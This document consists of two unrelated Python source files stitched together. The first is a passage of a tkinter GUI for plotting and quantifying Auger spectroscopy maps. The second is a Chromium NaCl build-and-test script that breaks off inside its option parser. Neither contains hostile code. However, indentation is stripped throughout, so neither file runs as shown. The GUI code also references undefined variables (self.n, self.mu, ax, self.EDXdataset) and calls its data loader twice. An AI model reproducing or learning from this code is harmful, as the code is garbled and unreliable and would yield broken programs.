# Key gives type of tkinter object
for i, (key, val) in enumerate(kwargs.items()):
if 'rad' in key: # Make radiobutton w/ choices list
prow=tk.Frame(bottomframe)
[param, choices]=kwargs.get(key,[])
tk.Label(prow, text=param).pack(side=tk.LEFT)
tkvars.append(tk.StringVar()) # single common variable for chosen radiobutton
for j, val in enumerate(choices): # list of opts for radiobutton
tk.Radiobutton(prow, text=val, value=val, variable=tkvars[i]).pack(side=tk.LEFT)
prow.pack(side="top", fill="both", expand=True, padx=100, pady=100)
elif 'chk' in key: # each dict val has param name, default bool val as 2 item list
prow=tk.Frame(bottomframe)
[param, val]=kwargs.get(key,['',''])
tkvars.append(tk.BooleanVar())
tkvars[i].set(val)
tk.Checkbutton(prow, text=param, variable=tkvars[i]).pack(side=tk.LEFT)
prow.pack(side="top", fill="both", expand=True, padx=100, pady=100)
elif 'ent' in key:
prow=tk.Frame(bottomframe)
[param, val]=kwargs.get(key,[])
tk.Label(prow, text=param).pack(side=tk.LEFT)
tkvars.append(tk.StringVar())
tk.Entry(prow, textvariable=tkvars[i]).pack(side=tk.LEFT)
prow.pack(side="top", fill="both", expand=True, padx=100, pady=100)
elif key=='command': # put command name at top?
topframe=tk.Frame(t)
tkvars.append(tk.StringVar()) # unused dummy
tk.Label(topframe, text=key).pack(side=tk.LEFT)
topframe.pack(side="top", fill="both", expand=True, padx=100, pady=100)
bottomframe.pack(side="bottom", fill="both", expand=True, padx=100, pady=100)
# Row for abort & run buttons
prow=tk.Frame(t)
tk.Button(prow, text='Abort', command=abort).pack(side=tk.LEFT)
mystr='Run '+kwargs.get('command','')
tk.Button(prow, text=mystr, command=runcmd).pack(side=tk.LEFT)
prow.pack(side="top", fill="both", expand=True, padx=100, pady=100)
class App(tk.Tk):
def __init__(self, parent=None):
tk.Tk.__init__(self, parent)
self.parent = parent
self.initialize()
def initialize(self):
self.title("Auger spectral plot")
# load/instantiate Auger data set
AESdata=AESdataset()
self.Augerparamlog, self.spelist, self.Smdifpeakslog, self.Backfitlog, self.Integquantlog, self.AESquantparams=AESdataset()
self.filename=self.spelist.iloc[0]['Filename'] # for autoloading of first spe file
self.Augerfile=pd.DataFrame()
self.filterstr = tk.StringVar()# filenums, name filters
tk.Label(self, text='Filename/number filter string').grid(row=0, column=0)
filentry=tk.Entry(self, textvariable=self.filterstr)
filentry.grid(row=0, column=1)
button = tk.Button(self, text="Quit", command=self.on_click)
button.grid(row=1, column=0)
button = tk.Button(self, text="Update plot", command=self.on_click)
button.grid(row=1, column=0)
fig = Figure(figsize=(6, 4), dpi=96)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212, sharex=ax1)
x, y = self.data(self.n.get(), self.mu.get())
self.line1, = ax.plot(x, y)
self.graph = FigureCanvasTkAgg(fig, master=self)
canvas = self.graph.get_tk_widget()
canvas.grid(row=0, column=2)
def on_click(self):
self.quit()
def filterfiles(self):
''' grab filter string and apply to '''
self.quit()
def on_change(self, value):
x, y = self.data(self.n.get(), self.mu.get())
self.line1.set_data(x, y) # update data
# set plot limit
# ax = self.graph.figure.axes[0]
# ax.set_xlim(min(x), max(x))
# ax.set_ylim(min(y), max(y))
# update graph
self.graph.draw()
def data(self, n, mu):
lst_y = []
for i in range(n):
lst_y.append(mu * random.random())
return range(n), lst_y
class GUIrois():
''' Parent is GUImain, manages QMfile displayed in GUIplotter
handles element and plot selections '''
def __init__(self,root,parent):
self.root = root
self.parent = parent
# instance of QMfile local to the roi/opts window
self.QMfile = None
self.tkelems=[] # bools list for elem display or quant
self.activequant=[] # for at % results (on extracted spectrum)
self.showelems=False # toggle for showing elemental lines on plot
self.currxy = None # x,y of extracted spectrum (or avg x,y if mult pixels)
self.togglederiv =False # plot quant
# Element selector checkboxes
self.left_frame = tk.Frame(self.root)
self.elems_frame = tk.Frame(self.left_frame, pady=10)
self.elems_frame.pack(side=tk.TOP,fill=tk.X,expand=1)
self.misc_frame = tk.Frame(self.left_frame, pady=10)
self.misc_frame.pack(side=tk.TOP,fill=tk.X,expand=1)
self.left_frame.pack(side=tk.LEFT)
# Frame for display of counts/quant results (at right)
self.quant_frame = tk.Frame(self.root, pady=10)
self.quant_frame.pack(side=tk.LEFT,fill=tk.X,expand=1)
# Element presets (top of misc frame)
rowframe=tk.Frame(self.misc_frame)
tk.Button(rowframe, text='Clear all', command=self.clearall).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Button(rowframe, text='Select all', command=self.selectall).pack(side=tk.LEFT,fill=tk.X,expand=1)
rowframe.pack(fill=tk.X, expand=1)
# permanent buttons in misc_frame
rowframe=tk.Frame(self.misc_frame)
self.plottype=tk.StringVar()
tk.Radiobutton(rowframe, text='Shiftmap',value='Shiftmap',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Radiobutton(rowframe, text='Amplmap',value='Amplmap',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Radiobutton(rowframe, text='Integmap',value='Integmap',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Radiobutton(rowframe, text='Countsmax',value='Countsmax',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Radiobutton(rowframe, text='Elemmap',value='Elemmap',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Button(rowframe, text='Plot', command=self.plot_maps).pack(side=tk.LEFT,fill=tk.X,expand=1)
rowframe.pack(fill=tk.X, expand=1)
self.toggle_button = tk.Button(
self.misc_frame,text="Toggle deriv/direct",command=self.toggle_deriv)
self.toggle_button.pack(side=tk.TOP,fill=tk.X,expand=1)
self.label_button = tk.Button(
self.misc_frame,text="Label elements",command=self.label_elems)
self.label_button.pack(side=tk.TOP,fill=tk.X,expand=1)
self.quant_button = tk.Button(
self.misc_frame,text="Update quant", command=self.do_quant)
self.quant_button.pack(side=tk.TOP,fill=tk.X,expand=1)
def create_QMfile(self, directory):
''' Creates QM file instance (called from menu)
automatically finds pixarray and works from there '''
print('Creating QM file.')
self.QMfile = AESquantmap(directory)
print("QMfile created with name ", self.QMfile.uniquename)
#print("QMfile", QMfile.uniquename, "created.")
for child in self.elems_frame.winfo_children():
child.destroy()
# no direct pass to GUIplotter (only 2D projections)
# loads quant elements into elems frame
self.display_elems()
def save_specimage(self):
''' Call AESquantmap save_specimage '''
if not self.QMfile:
return
self.QMfile.save_specimage()
def toggle_deriv(self):
''' Toggle plotting from direct counts plot to s7d7 smooth-deriv '''
if self.togglederiv==False:
self.togglederiv=True
else:
self.togglederiv=False
def selectall(self):
''' Clear selected elements '''
for i, tkbool in enumerate(self.tkelems):
self.tkelems[i].set(1)
def clearall(self):
''' Clear selected elements '''
for i, tkbool in enumerate(self.tkelems):
self.tkelems[i].set(0)
def load_maps(self):
'''Menu/main lauched '''
if self.QMfile is not None:
self.QMfile.load_maps()
def save_maps(self):
'''Menu/main lauched save of amplmaps, integmaps and shiftmaps '''
if self.QMfile is not None:
self.QMfile.save_maps()
def save_pixarray(self):
'''Menu/main lauched save of pixarray file (after linking with
underlying data files '''
if self.QMfile is not None:
self.QMfile.save_pixarray()
def save_ampl_images(self):
''' Save all extracted amplitude images as separate jpgs '''
if self.QMfile is not None:
self.QMfile.save_ampl_images()
def find_all_peaks(self):
''' Normal and best method for data extraction from specimage '''
if self.QMfile is not None:
self.QMfile.find_all_peaks()
def find_peaks(self):
''' For selected element(s), find peak center '''
# check if shiftmaps and amplitudes maps have already been saved
print('Running find_peaks in GUIroi')
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
self.QMfile.find_negpeaks(i)
print('Negpeak positions found for element', str(i))
def plot_multiplex(self):
''' Display current extracted spectrum in specviewer
shows only active elems '''
if self.QMfile.extracted is None: return
actelemdata=[]
vals=[] # for scatter points on spectral plots (active elems only)
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
actelemdata.append(self.QMfile.elemdata[i])
if self.togglederiv==False:
vals.append(self.QMfile.integparams[i])
else:
vals.append(self.QMfile.derivparams[i])
print("Plotting current extracted spectrum")
# pass current extracted spectrum or its deriv (1d np arr) and subset of active elem data info
if self.togglederiv==False: # plot direct
# pass integration center/ background fit for plotting
pkwargs={'type':'integ', 'vals':vals}
self.parent.specviewer.plot_multiplex(self.QMfile.extracted, self.QMfile.energy,
actelemdata, self.currxy, **pkwargs)
else: # plot deriv
# pass list of deriv params (xvals/yvals) for plot for each peak
pkwargs={'type':'deriv', 'vals':vals}
self.parent.specviewer.plot_multiplex(self.QMfile.extracts7d7, self.QMfile.energy,
actelemdata, self.currxy, **pkwargs)
def plot_maps(self):
''' Display 2D arrays of various types in mapviewer '''
activeelems=[]
plotmaps=[]
title=''
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
if self.plottype.get()=='Shiftmap':
# Use togglederiv to decide between deriv shift and integ shift
if self.QMfile.shiftmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
if self.togglederiv: # use deriv based shift
plotmaps.append(self.QMfile.shiftmaps[i][:,:,0])
title='Peak shift deriv'
else: # use direct peak shift
plotmaps.append(self.QMfile.shiftmaps[i][:,:,1])
title='Peak shift direct'
elif self.plottype.get()=='Amplmap':
if self.QMfile.amplmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
# 0th layer is amplitude
plotmaps.append(self.QMfile.amplmaps[i][:,:, 0])
title='Peak amplitude'
elif self.plottype.get()=='Integmap':
if self.QMfile.integmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
plotmaps.append(self.QMfile.integmaps[i][:,:,0])
title='Integcounts map'
elif self.plottype.get()=='Countsmax':
if self.QMfile.integmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
# intensity before background subtraction at peak
plotmaps.append(self.QMfile.integmaps[i][:,:,2])
title='Integcounts map'
# TODO finish element map creation
elif self.plottype.get()=='Elemmap':
if self.QMfile.amplmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
plotmaps.append(self.QMfile.elemmaps[i][:,:,0])
title='Element map'
print("Plotting ", self.plottype.get(), "for elements", ".".join(activeelems))
self.parent.mapviewer.replot_maps(activeelems, plotmaps, title)
def display_elems(self):
''' Display available quant elements in elems_frame (self.QMfile.elements only
contains elements that already have quant results (not other random peaks) '''
for child in self.elems_frame.winfo_children():
child.destroy()
# Need to call frame header Label and
# Write header row into backregs
tk.Label(self.elems_frame, text='Available Elements').pack(side=tk.TOP,fill=tk.X,expand=1)
# tkelems bool variables for active/inactive for each element
self.tkelems=[]
for i, elem in enumerate(self.QMfile.elements):
self.tkelems.append(tk.BooleanVar())
self.tkelems[i].set(True)
# Unfortunately tk/mpl combo requires use of pack (not grid)
for i in range(0, len(self.QMfile.elements), 4):
# associated checkbutton for each quantelem
elemlistframe=tk.Frame(self.elems_frame)
tk.Checkbutton(elemlistframe, variable=self.tkelems[i]).pack(side=tk.LEFT)
tk.Label(elemlistframe, text=self.QMfile.elements[i]).pack(side=tk.LEFT)
try:
tk.Checkbutton(elemlistframe, variable=self.tkelems[i+1]).pack(side=tk.LEFT)
tk.Label(elemlistframe, text=self.QMfile.elements[i+1]).pack(side=tk.LEFT)
except: # out of list range problem
pass
try:
tk.Checkbutton(elemlistframe, variable=self.tkelems[i+2]).pack(side=tk.LEFT)
tk.Label(elemlistframe, text=self.QMfile.elements[i+2]).pack(side=tk.LEFT)
except:
pass
try:
tk.Checkbutton(elemlistframe, variable=self.tkelems[i+3]).pack(side=tk.LEFT)
tk.Label(elemlistframe, text=self.QMfile.elements[i+3]).pack(side=tk.LEFT)
except:
pass
elemlistframe.pack(fill=tk.X, expand=1)
def label_quant(self):
''' Add a text label with current quant results to map viewer?
launched via button '''
#TODO adjust position of text quant label
elems=[i[0] for i in self.activequant]
vals=[f[1] for f in self.activequant]
vals=[int(i) if i>1 else "%0.1f" % i for i in vals]
self.parent.mapviewer.label_quant(elems, vals)
def label_elems(self):
''' Get currently selected elements from elems frame and associated energy
pass to plotter.label_elems
toggle style button
TODO not implemented ... is this even necessary for multiplex?
'''
if self.showelems:
self.showelems=False
else:
self.showelems=True
elemparams=[] # list of [elem, energyval]
# active (checked) tk elements will automatically be updated on check, right?
if self.showelems:
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
match=self.EDXdataset.EDXquantparams[self.EDXdataset.EDXquantparams['element']==self.QMfile.elements[i]]
ev=match.iloc[0]['energy']
elemparams.append([self.QMfile.elements[i],ev])
# now pass info to plotter (can be empty list)
self.parent.mapviewer.plot_elems(elemparams)
def do_quant(self):
''' Generate at % and error for subset of selected elements
then display quant ... linked to quant button
quant results for current extract spectrum in QMfile.quant (e.g.[elem,
ampl, shift, corrampl (kfactor adjusted)]
'''
# Clear current values
self.activequant=[] # list w/ [elem symb, atperc, ampl]
self.activequant2=[] # list w/ [elem, atperc, ]
'''Parameters saved in quant2: [0] elem 1 integcnts [2] energy [3] corrcnts
[4] slope [5] intercept
'''
# note erratperc (3rd in list) is actual error not % err
corrsum=0.0
corrsum2=0.0
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
# Add elem, val for at % and corrected amplitude (deriv-based)
if self.QMfile.quant[i][2]>0:
corrsum+=self.QMfile.quant[i][2]
self.activequant.append([self.QMfile.quant[i][0], 0.0,
self.QMfile.quant[i][2]])
else:
self.activequant.append([self.QMfile.quant[i][0], 0.0, 0.0])
# Add element, at% value, corrcnts and integcounts (integ-based)
# quant2 is elem, integcnts, corrcnts
if self.QMfile.quant2[i][2]>0:
corrsum2+=self.QMfile.quant2[i][2]
# elem, at. %, corrcnts, integcnts
self.activequant2.append([self.QMfile.quant2[i][0], 0.0,
self.QMfile.quant2[i][2], self.QMfile.quant2[i][1]])
else:
self.activequant2.append([self.QMfile.quant[i][0], 0.0, 0.0,
self.QMfile.quant2[i][1]])
for i, vals in enumerate(self.activequant): # calc at %
self.activequant[i][1]=100*self.activequant[i][2]/corrsum
self.activequant2[i][1]=100*self.activequant2[i][2]/corrsum2
self.display_quant()
def display_quant(self):
''' Display elemental quant (deriv and integ) for extracted spectrum
'''
# Clear any existing widgets in backreg frame
for child in self.quant_frame.winfo_children():
child.destroy()
# sort active quant elements by at percent
self.activequant.sort(key=lambda x: float(x[1]), reverse=True)
self.activequant2.sort(key=lambda x: float(x[1]), reverse=True)
# Write header row into backregs
rowframe=tk.Frame(self.quant_frame)
tk.Label(rowframe, text='Element').pack(side=tk.LEFT)
tk.Label(rowframe, text='At%').pack(side=tk.LEFT)
tk.Label(rowframe, text='Corrampl').pack(side=tk.LEFT)
#tk.Label(rowframe, text='Corrcnts').pack(side=tk.LEFT)
#tk.Label(rowframe, text='Err corrcnts').pack(side=tk.LEFT)
print('Element At% Corrampl')
rowframe.pack(fill=tk.X, expand=1)
# For values display len(quantelems)!=len(activeelems)
for i, [elem, atper, corrampl] in enumerate(self.activequant):
rowframe=tk.Frame(self.quant_frame)
tempstr=elem+' '
tk.Label(rowframe, text=tempstr).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.1f" % atper).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.0f" % corrampl).pack(side=tk.LEFT)
rowframe.pack(fill=tk.X, expand=1)
print(elem+' '+"%.1f" % atper+' '"%.0f" % corrampl)
# also print sorted quant to spyder console
print('Element At% Corrcnts Integcounts')
rowframe.pack(fill=tk.X, expand=1)
# For values display len(quantelems)!=len(activeelems)
for i, [elem, atper, corrcnts, integcnts] in enumerate(self.activequant2):
rowframe=tk.Frame(self.quant_frame)
tempstr=elem+' '
tk.Label(rowframe, text=tempstr).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.1f" % atper).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.0f" % corrcnts).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.0f" % integcnts).pack(side=tk.LEFT)
rowframe.pack(fill=tk.X, expand=1)
print(elem+' '+"%.1f" % atper+' '+"%.0f" % corrcnts +' '+"%.0f" % integcnts)
def runcmd(self, ckwargs):
''' for menu launched commands with params '''
cmd=ckwargs.get('command')
if cmd=='uniform filter':
self.QMfile.uniform_filter(self, size=ckwargs.get('filter size', 1))
def getcurrxy(self, indices):
''' Find X, Y values from passed selection (list of indices) '''
xys=[[i,j] for i in range(0,self.QMfile.dim[0]) for j in range(0,self.QMfile.dim[1])]
# get subset of x,y vals using index passed by lasso
selectxys=[xys[i] for i in indices]
if len(selectxys)==1:
self.currxy=selectxys[0] # X, Y map location of current extracted spectrum
print('Current xy is:', self.currxy)
else: # Get average X,Y of multiple pixel selection
print(len(selectxys),' pixels selected')
xvals=[i[0] for i in selectxys]
yvals=[i[1] for i in selectxys]
avgx=int(sum(xvals)/len(xvals))
avgy=int(sum(yvals)/len(yvals))
self.currxy=[avgx, avgy]
def extract_spectrum(self, selected):
''' Pass back lasso-selected path or single point, create/extract average
spectrum over this X-Y set '''
if self.QMfile is not None:
self.QMfile.extract_spectrum(selected)
self.getcurrxy(selected)
# Now plot multiplex (w/ active elements)
self.plot_multiplex()
def save_extracted(self):
''' Save currently extracted spectrum (calling method from open QMfile'''
if self.QMfile is not None:
self.QMfile.save_extracted()
def print_spectralregs(self):
''' Pop up to show spectral regions, evbreaks, etc. '''
if self.QMfile is not None:
print(self.QMfile.spectralregs)
class SpectraViewer():
''' Spectral plotter window for Auger survey or multiplex spectra '''
def __init__(self,root, parent):
self.root = root
self.parent = parent
self.figure = mpl.figure.Figure(figsize=PLOT_SIZE, dpi=100)
self.ax = self.figure.add_subplot(111)
self.figure.subplots_adjust(bottom=0.15,right=0.95,top=0.95)
self.canvas = FigureCanvasTkAgg(self.figure,self.root)
# just use standard toolbar
self.toolbar = NavigationToolbar2TkAgg(self.canvas,self.root)
self.toolbar.update()
self.plot_widget = self.canvas.get_tk_widget()
self.plot_widget.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.toolbar.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.canvas.show()
def plot_multiplex(self, extracted, energy, elemdata, currxy, **pkwargs):
''' Add variable number of subplots
called from GUIrois
extracted is 1D numpy array (same len as full multiplex) -- either deriv
or direct is passed
energy is full multiplex range ev vals for extracted spectrum (as list)
elemdata has peak stop/start indices for plots -- only active elements
currxy is X, Y of extracted spectrum (or avg x,y of lassoed ROI)
'''
# since # of subplots can change, need to destroy and recreate
try:
self.canvas.get_tk_widget().destroy() # destroy previous plot
self.toolbar.destroy()
except:
pass
plottype=pkwargs.get('type') # integ or deriv
vals=pkwargs.get('vals') # list with scatter points/backfits/etc.
# plot from elemdata[i][ holds indices
numcols=min(len(elemdata),2) # 1 or 2 columns
numrows=math.ceil(len(elemdata)/2)
self.figure = mpl.figure.Figure(figsize=PLOT_SIZE, dpi=100)
self.figure.subplots_adjust(bottom=0.15,right=0.95,top=0.95)
self.ax=[]
for i, elemd in enumerate(elemdata):
self.ax.append(self.figure.add_subplot(numrows,numcols,i+1))
[lowind, junk]=elemd[3]
[junk,highind]=elemd[4]
idealev=elemd[8] # ideal peak eV
symbol=elemd[0] # name of element/peak
self.ax[i].plot(energy[lowind:highind], extracted[lowind:highind])
self.ax[i].axvline(x=idealev)
energy=[int(i) for i in energy] # ensure ints
# for deriv vals is list of dfs w/ scatter points
if plottype=='deriv':
# derxvals and deryvals passed np arrays to add pospeak/negpeak
# as scatter plot
[elem, xvals, yvals, ampl]=vals[i]
self.ax[i].scatter(xvals, yvals, color='r')
# add elem and amplitude as text label
tempstr=symbol+' Ampl:'+ "%.2f" % ampl
self.ax[i].set_title(tempstr, fontsize=10)
elif plottype=='integ':
# elem, peak energy (integration center), integcnts, slope/ intercept of backfit
[elem, peakev, integcnts, slope, intercept]=vals[i]
# Scatter point at integration center
yvals= extracted[energy.index(peakev)]
self.ax[i].scatter(peakev, yvals, color='r')
# Plot background fit line
x=np.linspace(min(energy[lowind:highind]), max(energy[lowind:highind]), 100)
self.ax[i].plot(x, x*slope+intercept, color='r')
# add elem symbol and integcounts as subplot title
tempstr=symbol+' Integcnts:'+str(integcnts)
self.ax[i].set_title(tempstr, fontsize=10)
# label with integrat
# add vertical lines at ideal position
labelstr='X: '+str(currxy[0])+' Y: '+str(currxy[1])
self.ax[0].text(0.05,0.95, labelstr, transform=self.ax[0].transAxes, fontsize=12)
# recreate and pack
self.canvas = FigureCanvasTkAgg(self.figure, self.root)
self.toolbar = NavigationToolbar2TkAgg(self.canvas,self.root)
self.toolbar.update()
self.plot_widget = self.canvas.get_tk_widget()
self.plot_widget.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.toolbar.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.canvas.show()
def label_quant(self, elems, vals):
''' Add quant text label with active elems and at. % values '''
if self.EDXfile is None:return
# Add vertical lines at known element energies
fullstr=''
for i, (elem,val) in enumerate(zip(elems, vals)):
tempstr=r'$%s_{%.0f}$' %(elem, float(val))
fullstr+=tempstr
# transform=ax.transAxes uses coords from 0 to 1 (instead of true x and y vals)
self.ax.text(0.05,0.95, fullstr, fontsize=30, verticalalignment='top', transform=self.ax.transAxes)
self.canvas.show()
|
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Do all the steps required to build and test against nacl."""
import optparse
import os.path
import re
import shutil
import subprocess
import sys
# Copied from buildbot/buildbot_lib.py
def TryToCleanContents(path, file_name_filter=lambda fn: True):
"""
Remove the contents of a directory without touching the directory itself.
Ignores all failures.
"""
if os.path.exists(path):
for fn in os.listdir(path):
TryToCleanPath(os.path.join(path, fn), file_name_filter)
# Copied from buildbot/buildbot_lib.py
def TryToCleanPath(path, file_name_filter=lambda fn: True):
"""
Removes a file or directory.
Ignores all failures.
"""
if os.path.exists(path):
if file_name_filter(path):
print 'Trying to remove %s' % path
if os.path.isdir(path):
shutil.rmtree(path, ignore_errors=True)
else:
try:
os.remove(path)
except Exception:
pass
else:
print 'Skipping %s' % path
def FindChrome(src_dir, options):
if options.browser_path:
return options.browser_path
# List of places that chrome could live.
# In theory we should be more careful about what platform we're actually
# building for.
# As currently constructed, this will also hork people who have debug and
# release builds sitting side by side who build locally.
mode = options.mode
chrome_locations = [
'build/%s/chrome.exe' % mode,
'chrome/%s/chrome.exe' % mode,
# For Linux buildbots. scripts/slave/extract_build.py extracts builds
# to src/sconsbuild/ rather than src/out/.
'sconsbuild/%s/chrome' % mode,
# Windows Chromium ninja builder
'out/%s/chrome.exe' % mode,
'out/%s/chrome' % mode,
# Mac Chromium make builder
'out/%s/Chromium.app/Contents/MacOS/Chromium' % mode,
# Mac release make builder
'out/%s/Google Chrome.app/Contents/MacOS/Google Chrome' % mode,
# Mac Chromium xcode builder
'xcodebuild/%s/Chromium.app/Contents/MacOS/Chromium' % mode,
# Mac release xcode builder
'xcodebuild/%s/Google Chrome.app/Contents/MacOS/Google Chrome' % mode,
]
# Pick the one with the newest timestamp.
latest_mtime = 0
latest_path = None
for chrome in chrome_locations:
chrome_filename = os.path.join(src_dir, chrome)
if os.path.exists(chrome_filename):
mtime = os.path.getmtime(chrome_filename)
if mtime > latest_mtime:
latest_mtime = mtime
latest_path = chrome_filename
if latest_path is not None:
return latest_path
raise Exception('Cannot find a chome binary - specify one with '
'--browser_path?')
# TODO(ncbray): this is somewhat unsafe. We should fix the underlying problem.
def CleanTempDir():
# Only delete files and directories like:
# a) C:\temp\83C4.tmp
# b) /tmp/.org.chromium.Chromium.EQrEzl
file_name_re = re.compile(
r'[\\/]([0-9a-fA-F]+\.tmp|\.org\.chrom\w+\.Chrom\w+\..+)$')
file_name_filter = lambda fn: file_name_re.search(fn) is not None
path = os.environ.get('TMP', os.environ.get('TEMP', '/tmp'))
if len(path) >= 4 and os.path.isdir(path):
print
print "Cleaning out the temp directory."
print
TryToCleanContents(path, file_name_filter)
else:
print
print "Cannot find temp directory, not cleaning it."
print
def RunCommand(cmd, cwd, env):
sys.stdout.write('\nRunning %s\n\n' % ' '.join(cmd))
sys.stdout.flush()
retcode = subprocess.call(cmd, cwd=cwd, env=env)
if retcode != 0:
sys.stdout.write('\nFailed: %s\n\n' % ' '.join(cmd))
sys.exit(retcode)
def RunTests(name, cmd, nacl_dir, env):
sys.stdout.write('\n\nBuilding files needed for %s testing...\n\n' % name)
RunCommand(cmd + ['do_not_run_tests=1', '-j8'], nacl_dir, env)
sys.stdout.write('\n\nRunning %s tests...\n\n' % name)
RunCommand(cmd, nacl_dir, env)
def BuildAndTest(options):
# Refuse to run under cygwin.
if sys.platform == 'cygwin':
raise Exception('I do not work under cygwin, sorry.')
# By default, use the version of Python is being used to run this script.
python = sys.executable
if sys.platform == 'darwin':
# Mac 10.5 bots tend to use a particularlly old version of Python, look for
# a newer version.
macpython27 = '/Library/Frameworks/Python.framework/Versions/2.7/bin/python'
if os.path.exists(macpython27):
python = macpython27
script_dir = os.path.dirname(os.path.abspath(__file__))
src_dir = os.path.dirname(os.path.dirname(os.path.dirname(script_dir)))
nacl_dir = os.path.join(src_dir, 'native_client')
# Decide platform specifics.
env = dict(os.environ)
if sys.platform in ['win32', 'cygwin']:
if options.bits == 64:
bits = 64
elif options.bits == 32:
bits = 32
elif '64' in os.environ.get('PROCESSOR_ARCHITECTURE', '') or \
'64' in os.environ.get('PROCESSOR_ARCHITEW6432', ''):
bits = 64
else:
bits = 32
msvs_path = ';'.join([
r'c:\Program Files\Microsoft Visual Studio 9.0\VC',
r'c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC',
r'c:\Program Files\Microsoft Visual Studio 9.0\Common7\Tools',
r'c:\Program Files (x86)\Microsoft Visual Studio 9.0\Common7\Tools',
r'c:\Program Files\Microsoft Visual Studio 8\VC',
r'c:\Program Files (x86)\Microsoft Visual Studio 8\VC',
r'c:\Program Files\Microsoft Visual Studio 8\Common7\Tools',
r'c:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Tools',
])
env['PATH'] += ';' + msvs_path
scons = [python, 'scons.py']
elif sys.platform == 'darwin':
bits = 32
scons = [python, 'scons.py']
else:
p = subprocess.Popen(
'uname -m | '
'sed -e "s/i.86/ia32/;s/x86_64/x64/;s/amd64/x64/;s/arm.*/arm/"',
shell=True, stdout=subprocess.PIPE)
(p_stdout, _) = p.communicate()
assert p.returncode == 0
if options.bits == 64:
bits = 64
elif options.bits == 32:
bits = 32
elif p_stdout.find('64') >= 0:
bits = 64
else:
bits = 32
# xvfb-run has a 2-second overhead per invocation, so it is cheaper to wrap
# the entire build step rather than each test (browser_headless=1).
scons = ['xvfb-run', '--auto-servernum', python, 'scons.py']
chrome_filename = FindChrome(src_dir, options)
if options.jobs > 1:
scons.append('-j%d' % options.jobs)
scons.append('disable_tests=%s' % options.disable_tests)
if options.buildbot is not None:
scons.append('buildbot=%s' % (options.buildbot,))
# Clean the output of the previous build.
# Incremental builds can get wedged in weird ways, so we're trading speed
# for reliability.
shutil.rmtree(os.path.join(nacl_dir, 'scons-out'), True)
# check that the HOST (not target) is 64bit
# this is emulating what msvs_env.bat is doing
if '64' in os.environ.get('PROCESSOR_ARCHITECTURE', '') or \
'64' in os.environ.get('PROCESSOR_ARCHITEW6432', ''):
# 64bit HOST
env['VS90COMNTOOLS'] = ('c:\\Program Files (x86)\\'
'Microsoft Visual Studio 9.0\\Common7\\Tools\\')
env['VS80COMNTOOLS'] = ('c:\\Program Files (x86)\\'
'Microsoft Visual Studio 8.0\\Common7\\Tools\\')
else:
# 32bit HOST
env['VS90COMNTOOLS'] = ('c:\\Program Files\\Microsoft Visual Studio 9.0\\'
'Common7\\Tools\\')
env['VS80COMNTOOLS'] = ('c:\\Program Files\\Microsoft Visual Studio 8.0\\'
'Common7\\Tools\\')
# Run nacl/chrome integration tests.
# Note that we have to add nacl_irt_test to --mode in order to get
# inbrowser_test_runner to run.
# TODO(mseaborn): Change it so that inbrowser_test_runner is not a
# special case.
cmd = scons + ['--verbose', '-k', 'platform=x86-%d' % bits,
'--mode=opt-host,nacl,nacl_irt_test',
'chrome_browser_path=%s' % chrome_filename,
]
if not options.integration_bot and not options.morenacl_bot:
cmd.append('disable_flaky_tests=1')
cmd.append('chrome_browser_tests')
# Download the toolchain(s).
RunCommand([python,
os.path.join(nacl_dir, 'build', 'download_toolchains.py'),
'--no-arm-trusted', '--no-pnacl', 'TOOL_REVISIONS'],
nacl_dir, os.environ)
CleanTempDir()
if options.enable_newlib:
RunTests('nacl-newlib', cmd, nacl_dir, env)
if options.enable_glibc:
RunTests('nacl-glibc', cmd + ['--nacl_glibc'], nacl_dir, env)
def MakeCommandLineParser():
parser = optparse.OptionParser()
parser.add_option('-m', '--mode', dest='mode', default='Debug',
help='Debug/Release mode')
parser.add_option('-j', dest='jobs', default=1, type='int',
help='Number of parallel jobs')
parser.add_option('--enable_newlib', dest='enable_newlib', default=-1,
type='int', help='Run newlib tests?')
parser.add_option('--enable_glibc', dest='enable_glibc', default=-1,
type='int', help='Run glibc tests?')
# Deprecated, but passed to us by a script in the Chrome repo.
# Replaced by --enable_glibc=0
parser.add_option('--disable_glibc', dest='disable_glibc',
action='store_true', default=False,
help='Do not test using glibc.')
parser.add_option('--disable_tests', dest='disable_tests',
type='string', default='',
help='Comma-separated list of tests to omit')
builder_name = os.environ.get('BUILDBOT_BUILDERNAME', '')
is_integration_bot = 'nacl-chrome' in builder_name
parser.add_option('--integration_bot', dest='integration_bot',
type='int', default=int(is_integration_bot),
help='Is this an integration bot?')
is_morenacl_bot = (
'More NaCl' in builder_name or
'naclmore' in builder_name)
parser.add_option('--morenacl_bot', dest='morenacl_bot',
type='int', default=int(is_morenacl_bot),
help='Is this a morenacl bot?')
# Not used on the bots, but handy for running the script manually.
parser.add_option('--bits', dest='bits', action='store',
type='int', default=None,
help='32/64')
